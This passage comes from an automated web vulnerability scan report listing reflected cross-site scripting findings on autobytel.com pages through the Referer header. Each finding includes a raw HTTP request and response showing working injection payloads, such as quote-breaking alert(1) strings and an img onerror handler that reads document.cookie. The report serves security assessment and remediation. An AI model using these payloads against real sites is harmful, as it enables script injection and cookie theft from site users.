Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=43339"%3balert(1)//8f32a5fa65

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:34:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:34:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:34:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:34:08 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E43339%22%3Balert%281%29%2F%2F8f32a5fa65;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53152


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB430 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~43339";alert(1)//8f32a5fa65";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47C5C915-C42B-29C6-CB3C4820
...[SNIP]...

4.1936. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 1bb3a--><img%20src%3da%20onerror%3dalert(1)>4f1f9a9fc8b was submitted in the Referer HTTP header. This input was echoed as 1bb3a--><img src=a onerror=alert(1)>4f1f9a9fc8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/research/article/index.cfm/filters/Auto%20Show HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=1bb3a--><img%20src%3da%20onerror%3dalert(1)>4f1f9a9fc8b

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:34:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:34:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:34:33 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:34:33 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E1bb3a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E4f1f9a9fc8b;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53192


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 1bb3a--><img src=a onerror=alert(1)>4f1f9a9fc8b -->
...[SNIP]...

4.1937. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58188"%3balert(1)//e6d87bfda67 was submitted in the Referer HTTP header. This input was echoed as 58188";alert(1)//e6d87bfda67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=58188"%3balert(1)//e6d87bfda67

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:43 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:43 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E58188%22%3Balert%281%29%2F%2Fe6d87bfda67;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45683


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~58188";alert(1)//e6d87bfda67";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47E4E6CE-BC88-30CA-55098C42
...[SNIP]...

4.1938. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 727dd--><img%20src%3da%20onerror%3dalert(1)>24c9032c8d0 was submitted in the Referer HTTP header. This input was echoed as 727dd--><img src=a onerror=alert(1)>24c9032c8d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=727dd--><img%20src%3da%20onerror%3dalert(1)>24c9032c8d0

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:59 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:59 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E727dd%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E24c9032c8d0;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45721


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 727dd--><img src=a onerror=alert(1)>24c9032c8d0 -->
...[SNIP]...

4.1939. http://www.autobytel.com/content/research/comparison/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/comparison/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ea24"%3balert(1)//01111d12432 was submitted in the Referer HTTP header. This input was echoed as 8ea24";alert(1)//01111d12432 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/comparison/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=8ea24"%3balert(1)//01111d12432

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:58:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:16 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:58:16 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E8ea24%22%3Balert%281%29%2F%2F01111d12432;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414231


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~8ea24";alert(1)//01111d12432";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48A10211-D052-62BD-B2394BEF
...[SNIP]...

4.1940. http://www.autobytel.com/content/research/comparison/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/comparison/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 98cfa--><img%20src%3da%20onerror%3dalert(1)>5e9e92a6325 was submitted in the Referer HTTP header. This input was echoed as 98cfa--><img src=a onerror=alert(1)>5e9e92a6325 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/research/comparison/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=98cfa--><img%20src%3da%20onerror%3dalert(1)>5e9e92a6325

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:58:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:58:52 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E98cfa%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E5e9e92a6325;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414256


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 98cfa--><img src=a onerror=alert(1)>5e9e92a6325 -->
...[SNIP]...

4.1941. http://www.autobytel.com/content/research/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload b2b0b--><img%20src%3da%20onerror%3dalert(1)>fc61a284c7c was submitted in the Referer HTTP header. This input was echoed as b2b0b--><img src=a onerror=alert(1)>fc61a284c7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/research/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=b2b0b--><img%20src%3da%20onerror%3dalert(1)>fc61a284c7c

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:30 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:30 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Eb2b0b%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Efc61a284c7c;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104174


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: b2b0b--><img src=a onerror=alert(1)>fc61a284c7c -->
...[SNIP]...

4.1942. http://www.autobytel.com/content/research/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bcb3"%3balert(1)//cd492363a17 was submitted in the Referer HTTP header. This input was echoed as 2bcb3";alert(1)//cd492363a17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=2bcb3"%3balert(1)//cd492363a17

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:08 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E2bcb3%22%3Balert%281%29%2F%2Fcd492363a17;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104164


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~2bcb3";alert(1)//cd492363a17";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47DF8752-E661-644C-5D3D34D1
...[SNIP]...

4.1943. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4daf0"%3balert(1)//354c9a1feaa was submitted in the Referer HTTP header. This input was echoed as 4daf0";alert(1)//354c9a1feaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=4daf0"%3balert(1)//354c9a1feaa

Response

